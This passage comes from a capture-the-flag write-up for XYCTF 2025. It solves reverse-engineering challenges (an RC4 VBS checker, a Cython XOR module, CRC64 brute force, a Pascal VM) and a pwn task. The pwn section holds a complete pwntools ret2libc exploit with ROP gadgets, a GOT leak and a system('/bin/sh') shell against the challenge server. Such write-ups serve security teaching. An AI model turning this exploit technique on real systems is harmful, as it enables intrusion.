366993/3033 ) , int( 116/1 ) , int( -4380+4481 ) , int( 234889/5729 ) , int( 374-330 ) , int( 7121-7089 ) , int( -964+1014 ) , int( -9185+9226 ) , int( 53105/4085 ) , int( 1368-1358 ) , int( 3776-3744 ) , int( 81760/2555 ) , int( 2908-2876 ) , int( 672/21 ) , int( 591084/7578 ) , int( -9777+9878 ) , int( 4310-4190 ) , int( -329+445 ) , int( 8841-8828 ) , int( 80190/8019 ) , int( 9449-9417 ) , int( 5188-5156 ) , int( 6912/216 ) , int( 46496/1453 ) , int( 8868-8855 ) , int( -6823+6833 ) , int( -5834+5866 ) , int( 7348-7316 ) , int( 214720/6710 ) , int( -3281+3313 ) , int( -6230+6312 ) , int( -281+398 ) , int( -5980+6090 ) , int( 2673-2591 ) , int( 233897/3491 ) , int( -8111+8143 ) , int( -3952+4013 ) , int( 7846-7814 ) , int( 5859-5748 ) , int( 661752/5656 ) , int( 742632/6402 ) , int( 2362-2290 ) , int( 286234/2834 ) , int( 814-694 ) , int( 40105/3085 ) , int( 4489-4479 ) , int( -838+907 ) , int( -8563+8673 ) , int( -2698+2798 ) , int( -2969+3001 ) , int( 7600-7530 ) , int( 896805/7665 ) , int( -8073+8183 ) , 
int( 1727-1628 ) , int( -6557+6673 ) , int( 3501-3396 ) , int( 87357/787 ) , int( 4403-4293 ) , int( 3724-3711 ) , int( 4260-4250 ) , int( -6051+6064 ) , int( -71+81 ) , int( 466-427 ) , int( 6300-6268 ) , int( -15360+8376 ) , int( -1.435792E+08/8237 ) , int( -21866-10 ) , int( -4.86175E+07/8145 ) , int( -1.932544E+08/5987 ) , int( 3287-3159 ) , int( -19485+2053 ) , int( -10516-6235 ) , int( 78936/6072 ) , int( -9394+9404 ) , int( 551807/7559 ) , int( 973692/9546 ) , int( 310720/9710 ) , int( 507832/6682 ) , int( 4001-3934 ) , int( -4647+4744 ) , int( -6770+6885 ) , int( 491163/4863 ) , int( 10032-9992 ) , int( -1066+1148 ) , int( 174330/1490 ) , int( 986700/8970 ) , int( 78064/952 ) , int( -5671+5738 ) , int( -6282+6322 ) , int( 4287-4185 ) , int( 3549-3441 ) , int( 790162/8146 ) , int( 8188-8085 ) , int( -800+844 ) , int( 522-490 ) , int( -5550+5663 ) , int( 284291/2389 ) , int( -9338+9440 ) , int( -6438+6539 ) , int( 8277-8236 ) , int( -8711+8752 ) , int( -5591+5623 ) , int( 148291/2431 ) , int( -3434+3466 ) , int( 425372/5597 ) , int( -5132+5199 ) , int( -322+419 ) , int( 185380/1612 ) , int( 5352-5251 ) , int( 365160/9129 ) , int( 9277-9158 ) , int( -489+590 ) , int( 913002/8951 ) , int( -8433+8531 ) , int( 8830-8713 ) , int( 1089-970 ) , int( 192990/1838 ) , int( -9564+9681 ) , int( -5453+5554 ) , int( 40221/981 ) , int( -7928+7960 ) , int( 756672/9008 ) , int( 785824/7556 ) , int( 1607-1506 ) , int( -5161+5271 ) , int( -8087+8100 ) , int( 90010/9001 ) , int( 34688/1084 ) , int( 20224/632 ) , int( 8731-8699 ) , int( 178496/5578 ) , int( -837+914 ) , int( -4694+4809 ) , int( -7603+7706 ) , int( 619212/9382 ) , int( 1092906/9846 ) , int( 7594-7474 ) , int( 69632/2176 ) , int( 133042/3913 ) , int( 9457-9390 ) , int( 2319-2208 ) , int( 475200/4320 ) , int( -8977+9080 ) , int( -8597+8711 ) , int( 1592-1495 ) , int( 754812/6507 ) , int( -6078+6195 ) , int( -9522+9630 ) , int( 1824-1727 ) , int( -6145+6261 ) , int( 312690/2978 ) , int( -1513+1624 ) , int( 
902220/8202 ) , int( 1378-1263 ) , int( -8522+8555 ) , int( -6796+6828 ) , int( -57+124 ) , int( -4239+4350 ) , int( 964212/8458 ) , int( 573534/5031 ) , int( 565903/5603 ) , int( -8417+8516 ) , int( 1116732/9627 ) , int( -8648+8680 ) , int( -6586+6656 ) , int( -1832+1908 ) , int( -5339+5404 ) , int( 559267/7877 ) , int( 138765/4205 ) , int( 2868-2834 ) , int( 556-543 ) , int( 53810/5381 ) , int( 212589/3081 ) , int( -4647+4755 ) , int( 712885/6199 ) , int( -1506+1607 ) , int( 91234/7018 ) , int( 1299-1289 ) , int( -4904+4936 ) , int( 9659-9627 ) , int( 117024/3657 ) , int( 38720/1210 ) , int( 440748/5724 ) , int( 19320/168 ) , int( -9444+9547 ) , int( -3384+3450 ) , int( 9050-8939 ) , int( -6493+6613 ) , int( -5110+5142 ) , int( -2061+2095 ) , int( 1450-1363 ) , int( 111+3 ) , int( 9913-9802 ) , int( 152680/1388 ) , int( -1082+1185 ) , int( 4066-4034 ) , int( 6896-6794 ) , int( 838-730 ) , int( -2902+2999 ) , int( 5974/58 ) , int( -8244+8290 ) , int( -9640+9674 ) , int( 36491/2807 ) , int( -2075+2085 ) , int( -301+370 ) , int( -2824+2934 ) , int( -2915+3015 ) , int( 1811-1779 ) , int( -7946+8019 ) , int( -5275+5377 ) , int( -7424+7437 ) , int( 34620/3462 )]
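# Fold every decoded value into a single byte before handing the list to
# bytes(), which only accepts 0..255. Some entries fall far outside that range
# (presumably wide-character codes from the script's non-ASCII comments -- not
# confirmed), so those bytes come out as mojibake.
#
# Python's % with a positive modulus always yields 0..255, so it is applied
# unconditionally. That also covers the value 256 itself, which the earlier
# `> 256` test let through to bytes() and a ValueError.
src = [value % 256 for value in src]

# Printed as a bytes literal; the recovered script is read, never executed.
print(bytes(src))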
输出去混淆后的vbs脚本,简单整理下格式
虽然还有乱码,但是不影响理解了
' Greeting and prompt: whatever the user types is kept in `flag`.
MsgBox "Dear CTFER. Have fun in XYCTF 2025!"
flag = InputBox("Enter the FLAG:", "XYCTF")
' Hex string that the script later compares with the output of RunRC(flag, qwfe).
' (The sample's own comments were non-ASCII and were garbled by the byte-wise
' decode; they are replaced here by descriptions of what the code does.)
wefbuwiue = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4"
' Key passed to RunRC. It is stored in clear text next to the expected
' ciphertext, so the comparison value can be decrypted offline.
qwfe = "rc4key"
' RunRC(sMessage, strKey): RC4-style stream encryption of sMessage under strKey.
' Returns the result as a hex string, two hex digits per input character.
' Each output byte is a keystream byte XORed with the input character code, so
' running the same keystream over the ciphertext bytes gives back the plaintext.
' NOTE(review): an empty strKey makes kLen 0 and the `i Mod kLen` below fail.
Function RunRC(sMessage, strKey)
Dim kLen, i, j, temp, pos, outHex
Dim s(255), k(255)
' Initialise: s holds 0..255 in order, k holds the key repeated to 256 entries.
kLen = Len(strKey)
For i = 0 To 255
s(i) = i
k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1)) ' character code of the key character at index i Mod kLen
Next
' KSA: key-scheduling pass that permutes s using k.
j = 0
For i = 0 To 255
j = (j + s(i) + k(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
Next
' PRGA: one keystream byte per input character.
i = 0 : j = 0 : outHex = ""
For pos = 1 To Len(sMessage)
i = (i + 1) Mod 256
j = (j + s(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
' XOR the keystream byte with the input character code and append it as two hex digits.
Dim plainChar, cipherByte
plainChar = Asc(Mid(sMessage, pos, 1)) ' character code of the input character at pos
cipherByte = s((s(i) + s(j)) Mod 256) Xor plainChar
outHex = outHex & Right("0" & Hex(cipherByte), 2) ' left-pad so every byte is exactly two digits
Next
RunRC = outHex
End Function
' Check: encrypt the entered flag with the embedded key and compare the hex
' output, case-insensitively, with the embedded hex string.
If LCase(RunRC(flag, qwfe)) = LCase(wefbuwiue) Then
MsgBox "Congratulations! Correct FLAG!"
Else
MsgBox "Wrong flag."
End If
可以看出输入的flag经过RC4加密后,与脚本里硬编码的十六进制密文比较;密钥 rc4key 和密文都明文写在脚本中,所以直接用CyberChef做RC4解密(密文按Hex输入)即可得到flag。最后MD5提交
moon#
比较常规的py调用pyd。一开始不能正常运行,后来尝试换了几个版本,在3.11跑起来了
用help命令,简单看一下:
从这里就可以推测出加密逻辑了,之后结合静态分析进一步验证。
IDA分析pyd,去了符号,但是可以看到一个导出函数 PyInit_moon
。结合分析cython的经验,我们要找的函数应该在它之前,所以能比较容易定位到题中两个函数的实现。
sub_180002550
维护了一个类似字符串常量池的结构,后面分析时要经常借助这里面的字符串和偏移量来恢复符号。偏移和对应的字符串在内存上是紧挨着的。
函数的调用也是有迹可循的,一般是先从字符串池中拿到函数名,之后拿到函数的引用,最后显式调用 PyObject_Call
之类的API完成调用,中间穿插大量错误检查的代码和GC等等。一些明显的特征如下:
PyErr_Format(PyExc_NameError, "name '%U' is not defined", var);
PyObject_GetAttr(v1, v2);
PyDict_GetItem_KnownHash
基本数据类型的方法一般是由API直接实现,比如 PyNumber_Xor
之类。结合这些信息,大概分析出逻辑:
xor_crypt
:初始化seed,用random.randint
得到的随机数和传入的字节数组异或
check_flag
:调用xor_crypt
,和硬编码的密文比较。
因为check的逻辑不复杂,而且异或可逆,所以可以黑盒调用 xor_crypt
,传入密文得到明文flag。
# NOTE: `import moon` loads the challenge's compiled extension (.pyd) and runs
# its native initialisation code in this process, so run this script inside an
# isolated analysis environment.
import moon

# Per the analysis above, xor_crypt XORs its input with a seeded random stream.
# Passing the expected ciphertext with the same seed therefore returns the
# plaintext.
seed_val = moon.SEED
target = moon.TARGET_HEX

# Decode the hex text two characters at a time into byte values.
data = []
for offset in range(0, len(target) - 1, 2):
    data.append(int(target[offset:offset + 2], 16))

print(moon.xor_crypt(seed_val, bytes(data)))
Dragon#
bc
文件格式对应LLVM的bitcode IR,使用LLVM编译工具链中的 llc
将其编译为x86/64架构的目标文件
llc .\Dragon.bc -filetype=obj -o Dragon.o
IDA分析,输入的flag每2个字节一组计算CRC64,再与硬编码的结果比较。每组只有2个字节,可打印字符的组合不到一万种,所以可以逐组爆破求解。
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<stdint.h>
#include"ida_def.h"
/*
 * Bitwise CRC-64 over a2 bytes starting at a1, as recovered from the binary.
 *
 * The register starts as all ones, each byte is XORed into the top 8 bits and
 * shifted out most-significant bit first with polynomial 0x42F0E1EBA9EA3693,
 * and the final value is complemented.
 * NOTE(review): these parameters look like the CRC-64/WE variant of the
 * ECMA-182 polynomial -- confirm against a reference implementation.
 */
__int64 calculate_crc64_direct(unsigned __int8 *a1, unsigned __int64 a2)
{
    uint64_t crc = UINT64_MAX;

    for (unsigned __int64 idx = 0; idx < a2; ++idx)
    {
        crc ^= (uint64_t)a1[idx] << 56;
        for (int bit = 0; bit < 8; ++bit)
        {
            /* The top bit decides whether the polynomial is folded in. */
            uint64_t top_bit_set = crc >> 63;
            crc <<= 1;
            if (top_bit_set)
                crc ^= 0x42F0E1EBA9EA3693ull;
        }
    }
    return (__int64)~crc;
}
/*
 * Find the two printable ASCII bytes (0x20..0x7E each) whose CRC-64 equals
 * target_crc and store them in result[0] and result[1].
 *
 * Candidates are tried with the first byte as the outer loop, so the first
 * match in that order wins. If nothing matches, both output bytes are zero.
 */
void brute(uint64_t target_crc, uint8_t *result)
{
    uint8_t pair[2];
    int hi, lo;

    for (hi = 0x20; hi < 0x7F; hi++) {
        pair[0] = (uint8_t)hi;
        for (lo = 0x20; lo < 0x7F; lo++) {
            pair[1] = (uint8_t)lo;
            if ((uint64_t)calculate_crc64_direct(pair, 2) != target_crc)
                continue;
            result[0] = pair[0];
            result[1] = pair[1];
            return;
        }
    }

    /* No candidate pair produced the target checksum. */
    result[0] = 0;
    result[1] = 0;
}
/*
 * Expected checksums: 96 bytes, copied by main() into twelve 64-bit values,
 * one per two-character group of the flag.
 * NOTE(review): the copy is a raw memcpy, so the bytes are read in the
 * host's byte order (presumably little-endian x86-64) - confirm.
 */
unsigned char crcdata[] =
{
0x47, 0x7B, 0x9F, 0x41, 0x4E, 0xE3, 0x63, 0xDC, 0xC6, 0xBF,
0xB2, 0xE7, 0xD4, 0xF8, 0x1E, 0x03, 0x9E, 0xD8, 0x5F, 0x62,
0xBC, 0x2F, 0xD6, 0x12, 0xE8, 0x55, 0x57, 0xCC, 0xE1, 0xB6,
0xE8, 0x83, 0xCC, 0x65, 0xB6, 0x2A, 0xEB, 0xB1, 0x7B, 0xFC,
0x6B, 0xD9, 0x62, 0x2A, 0x1B, 0xCA, 0x82, 0x93, 0x87, 0xC3,
0x73, 0x76, 0xA0, 0xF8, 0xFF, 0xB1, 0xE1, 0x05, 0x8E, 0x38,
0x27, 0x16, 0xA8, 0x0D, 0xB7, 0xAA, 0xD0, 0xE8, 0x1A, 0xE6,
0xF1, 0x9E, 0x45, 0x61, 0xF2, 0xE7, 0xD2, 0x3F, 0x78, 0x92,
0x0B, 0xE6, 0x6F, 0xF5, 0xA1, 0x7C, 0xC9, 0x63, 0xAB, 0x3A,
0xB7, 0x43, 0xB0, 0xA8, 0xD3, 0x9B
};
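/*
 * Recover the flag two characters at a time: each of the twelve 64-bit
 * values in crcdata is matched against the CRC-64 of every printable pair.
 * The partial result is printed after each group.
 */
int main()
{
    __int64 v7[13];
    /*
     * Zero-initialised so the buffer is always NUL-terminated: printf("%s")
     * runs after every group, while the tail of the buffer is still
     * unwritten, and would otherwise read indeterminate stack bytes.
     */
    unsigned char result[0x42] = {0};

    /* 0x60 bytes = twelve 64-bit checksums, taken in host byte order. */
    memcpy(v7, crcdata, 0x60u);
    for (int r = 0; r < 12; r++)
    {
        brute(v7[r], result + 2 * r);
        printf("%s\n", (char *)result);
    }
    return 0;
}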
Lake#
Pascal编译的程序,先在github找了一圈,没找到现成的反编译工具。还是用IDA老老实实分析。
尝试用finger恢复了一部分符号,效果还不错。
之后在 start
函数附近找到了加密逻辑:
switch-case
实现了一个简单的虚拟机,可以发现handler都是一些基本的二元运算,编写脚本来还原代码
# VM program recovered from the binary, laid out one instruction per row.
# Each instruction is three words; dis()/dec_dis() read them as
# (opcode, data index, operand).
bytecode = [
    0x02, 0x02, 0x0C,
    0x01, 0x1A, 0x55,
    0x01, 0x23, 0x0C,
    0x02, 0x0E, 0x09,
    0x01, 0x1B, 0x06,
    0x08, 0x06, 0x05,
    0x08, 0x01, 0x05,
    0x02, 0x1B, 0x0E,
    0x02, 0x19, 0x03,
    0x02, 0x1A, 0x04,
    0x08, 0x04, 0x08,
    0x01, 0x03, 0x0C,
    0x02, 0x0C, 0x0A,
    0x01, 0x25, 0x02,
    0x01, 0x20, 0x02,
    0x01, 0x09, 0x0C,
    0x08, 0x1A, 0x05,
    0x02, 0x04, 0x0D,
    0x08, 0x08, 0x0F,
    0x02, 0x0A, 0x0E,
    0x01, 0x10, 0x07,
    0x01, 0x0C, 0x07,
    0x08, 0x22, 0x08,
    0x08, 0x15, 0x0A,
    0x01, 0x27, 0x7E,
    0x02, 0x07, 0x02,
    0x08, 0x0F, 0x03,
    0x08, 0x0A, 0x0A,
    0x01, 0x22, 0x0B,
    0x02, 0x12, 0x08,
    0x02, 0x19, 0x09,
    0x08, 0x0E, 0x06,
    0x08, 0x00, 0x05,
    0x01, 0x0A, 0x08,
    0x08, 0x1B, 0x07,
    0x08, 0x0D, 0x06,
    0x08, 0x0D, 0x04,
    0x08, 0x17, 0x0C,
    0x08, 0x22, 0x0E,
    0x02, 0x12, 0x34,
    0x01, 0x26, 0x77,
]
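# Opcode -> printf-style template for the statement the VM handler performs.
# Both %d slots are filled by dis() with (data index, operand).
handler = {
    1: "data[%d] += %d",
    2: "data[%d] -= %d",
    3: "data[%d] *= %d",
    4: "data[%d] /= %d",
    # A literal percent sign must be doubled inside a %-format template;
    # the bare "%=" raised ValueError as soon as opcode 5 was formatted.
    5: "data[%d] %%= %d",
    6: "data[%d] &= %d",
    7: "data[%d] |= %d",
    8: "data[%d] ^= %d",
}

# Opcode -> template for the statement that undoes the handler above.
# Opcodes 5, 6 and 7 (mod, and, or) are absent, so dec_dis() raises KeyError
# for them. The "/=" listed for opcode 3 only undoes a multiplication that
# did not overflow - verify against the VM before relying on it.
dec_handler = {
    1: "data[%d] -= %d",
    2: "data[%d] += %d",
    3: "data[%d] /= %d",
    4: "data[%d] *= %d",
    8: "data[%d] ^= %d",
}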
def dis(lst):
    """Print the statement one [opcode, index, operand] instruction performs."""
    print(handler[lst[0]] % (lst[1], lst[2]))
def dec_dis(lst):
    """Print the statement that undoes one [opcode, index, operand] instruction.

    Raises KeyError for an opcode that has no entry in dec_handler.
    """
    print(dec_handler[lst[0]] % (lst[1], lst[2]))
# Walk the program three words at a time, printing each instruction's forward
# statement followed by its inverse.
for start in range(0, len(bytecode), 3):
    instruction = bytecode[start:start + 3]
    dis(instruction)
    dec_dis(instruction)
之后发现加密都是单字节的线性运算,只用到了加减和异或,还原时输出对应的逆运算即为解密代码。
后面还有一个4字节的编码,通过移位打乱位的顺序,也是比较容易写出逆运算。
def decode_optimized(data):
    """Undo the per-group bit shuffle on the first 40 values of *data*.

    The input is handled in ten groups of four. Every input value is split
    into its low three bits and its high five bits, and each output value is
    assembled from one high part (moved down by 3) and one low part (moved up
    by 5) taken from two different inputs of the same group.

    Returns a list of 40 integers in the range 0..255. Raises IndexError when
    *data* has fewer than 40 items.
    """
    original = bytearray(40)
    for base in range(0, 40, 4):
        d0, d1, d2, d3 = (data[base + offset] for offset in range(4))
        original[base] = ((d3 & 0xF8) >> 3) | ((d2 & 0x07) << 5)
        original[base + 1] = ((d3 & 0x07) << 5) | ((d0 & 0xF8) >> 3)
        original[base + 2] = ((d1 & 0xF8) >> 3) | ((d0 & 0x07) << 5)
        original[base + 3] = ((d2 & 0xF8) >> 3) | ((d1 & 0x07) << 5)
    return list(original)
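# Encoded flag bytes taken from the binary.
data = [0x4A, 0xAB, 0x9B, 0x1B, 0x61, 0xB1, 0xF3, 0x32, 0xD1, 0x8B,
        0x73, 0xEB, 0xE9, 0x73, 0x6B, 0x22, 0x81, 0x83, 0x23, 0x31,
        0xCB, 0x1B, 0x22, 0xFB, 0x25, 0xC2, 0x81, 0x81, 0x73, 0x22,
        0xFA, 0x03, 0x9C, 0x4B, 0x5B, 0x49, 0x97, 0x87, 0xDB, 0x51]

# The 4-byte shuffle was the last encoding step, so it is undone first.
data = decode_optimized(data)

# Inverse of every VM instruction as (data index, operator, operand), listed
# in the order the VM executed the original instructions.
inverse_steps = [
    (2, "+", 12), (26, "-", 85), (35, "-", 12), (14, "+", 9),
    (27, "-", 6), (6, "^", 5), (1, "^", 5), (27, "+", 14),
    (25, "+", 3), (26, "+", 4), (4, "^", 8), (3, "-", 12),
    (12, "+", 10), (37, "-", 2), (32, "-", 2), (9, "-", 12),
    (26, "^", 5), (4, "+", 13), (8, "^", 15), (10, "+", 14),
    (16, "-", 7), (12, "-", 7), (34, "^", 8), (21, "^", 10),
    (39, "-", 126), (7, "+", 2), (15, "^", 3), (10, "^", 10),
    (34, "-", 11), (18, "+", 8), (25, "+", 9), (14, "^", 6),
    (0, "^", 5), (10, "-", 8), (27, "^", 7), (13, "^", 6),
    (13, "^", 4), (23, "^", 12), (34, "^", 14), (18, "+", 52),
    (38, "-", 119),
]

# Undo the last instruction first. Add/sub and xor on the same index do not
# commute, so replaying the inverses in forward order corrupts every byte
# that received both kinds of operation (indices 26, 10, 14 and 34 here).
# Results are masked to one byte so bytes() never sees an out-of-range value.
# NOTE(review): assumes the VM works on 8-bit values - confirm in the handlers.
for index, op, operand in reversed(inverse_steps):
    if op == "+":
        data[index] = (data[index] + operand) & 0xFF
    elif op == "-":
        data[index] = (data[index] - operand) & 0xFF
    else:
        data[index] ^= operand

print(bytes(data))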
解出的flag有几个字节不正确,但是大部分没问题,根据上下文含义修复一下即可。出错的字节应当都落在同一下标既做过加减又做过异或的位置:这两类运算不可交换,逆运算若按字节码的正向顺序执行就会算错,按相反顺序执行才能得到正确结果。
Pwn#
ret2libc’s revenge#
签到pwn,无PIE,无canary,放心栈溢出。
使用 fgetc(stdin)
循环读取输入,写入数组时没有越界检查,导致栈溢出;修复时只需让循环以缓冲区长度为上界。
题目已经明示了打 ret2libc,刚好虚拟机是glibc 2.35,和题中版本一样,省了不少事
先找几个有用的gadget。
0x000000000040101a : ret
0x0000000000401016 : add rsp, 8 ; ret
0x0000000000401017 : add esp, 8 ; ret
0x00000000004010e3 : nop ; and rsi, 0 ; ret
0x00000000004010e4 : and rsi, 0 ; ret
0x00000000004010e5 : and esi, 0 ; ret
0x00000000004010ea : nop ; add rsi, qword ptr [rbp + 0x20] ; ret
0x00000000004010ec : add esi, dword ptr [rbp + 0x20] ; ret
0x00000000004010eb : add rsi, qword ptr [rbp + 0x20] ; ret
0x0000000000401180 : mov rdi, rsi ; ret
0x0000000000401181 : mov edi, esi ; ret
发现不能直接控制 rdi
,但是可以构造如下的ROP链 替换原先的 pop rdi ;ret
and rsi, 0; ret
add rsi, qword ptr [rbp + 0x20]; ret
ret
ret
add rsp, 8; ret
qword rdi_value
mov rdi, rsi; ret
因为要用到 rbp
来写入寄存器,所以溢出时不能覆盖 rbp
的值,可以在覆盖 v6
的时候直接改成 rbp+8
的地址,跳到写rop的地方来。
另外,stdout
设置了全缓冲,要多次返回 main
挤满缓冲区拿到输出。本地的缓冲区长度和远程不一样,多次尝试发现远程长度是 0x1000
。
(赛时在这里卡了很久,半天看不到 puts_got
的回显,一度以为自己rop链有问题,本地各种尝试也没搞明白。后来看到主函数中的 puts
也没输出,开始想是不是 setvbuf
动了手脚,一看果然。。
完整exp:
from pwn import *
# pwntools settings: 64-bit Linux target, with all traffic logged.
context(os="linux",arch="amd64",log_level="debug")
# Challenge instance; the commented-out line runs the local binary instead.
host,port = "39.106.71.197", 30761
io=remote(host,port)
#io=process("./attachment")
# Gadget addresses from the listing earlier in the write-up. They are fixed
# values because the binary is built without PIE.
ret = 0x40101a
and_rsi_ret = 0x4010e4
add_rsi_ret = 0x4010eb
add_rsp_ret = 0x401016
mov_rdi_rsi_ret = 0x401180
# NOTE(review): presumably the entry addresses of main and of the vulnerable
# function; neither is shown on the page.
main_addr = 0x40127b
revenge_addr = 0x4011ff
elf=ELF("./attachment")
libc=ELF("./libc-2.35.so")
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
# Filler up to the loop's index variable, then one byte that rewrites it so
# the following writes land at rbp+8 and the saved rbp stays intact (the
# add-rsi gadget reads through rbp). Offsets come from the author's analysis.
padstack = b'a' * (0x220 - 4) + b'\x28'
# Plain return to main: only adds output to the fully buffered stdout.
payload0 = padstack + p64(main_addr)
# Leak chain. There is no "pop rdi" gadget, so rdi is loaded indirectly:
# rsi is cleared, a qword is added to it from [rbp + 0x20], and rsi is then
# copied into rdi before puts() is called.
payload1 = flat([
    padstack,
    p64(and_rsi_ret),
    p64(add_rsi_ret),
    p64(ret),
    p64(ret),
    p64(add_rsp_ret),      # skips the data slot below
    p64(puts_got),         # data slot: the value destined for rdi
    p64(mov_rdi_rsi_ret),
    p64(puts_plt),         # prints the resolved address stored in puts' GOT entry
    p64(revenge_addr)      # back into the program for the next payload
])
def stdout_leak():
    """Fill the fully buffered stdout until it flushes, then return the leaked puts address.

    Uses the module-level ``io``, ``payload0`` and ``payload1``.
    """
    # NOTE(review): assumes each pass through main adds 19 bytes to a
    # 0x1000-byte buffer, as measured by the author on the remote service.
    io_round = 0x1000//19-1
    for i in range(io_round):
        io.sendline(payload0)
    io.sendline(payload1)
    # One more plain round so the buffer fills up and is flushed.
    io.sendline(payload0)
    out = io.recv(0x1000)
    # The leaked bytes follow (io_round + 1) blocks of 19 bytes; only the six
    # low bytes of the address are taken and zero-padded to eight for u64().
    leak_addr = out[(io_round+1)*19:][:6]
    leak_addr = u64(leak_addr.ljust(8,b"\x00"))
    print(hex(leak_addr))
    return leak_addr
leak = stdout_leak()
# Rebase the libc image: load base = leaked puts address - puts' offset.
libc.address = leak - libc.symbols["puts"]
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh\x00"))
# Same rdi-loading chain as payload1, with the "/bin/sh" string address in
# the data slot and system() as the final call.
payload2 = flat([
    padstack,
    p64(and_rsi_ret),
    p64(add_rsi_ret),
    p64(ret),
    p64(ret),
    p64(add_rsp_ret),      # skips the data slot below
    p64(binsh),            # data slot: the value destined for rdi
    p64(mov_rdi_rsi_ret),
    p64(system)
])
io.sendline(payload2)
io.interactive()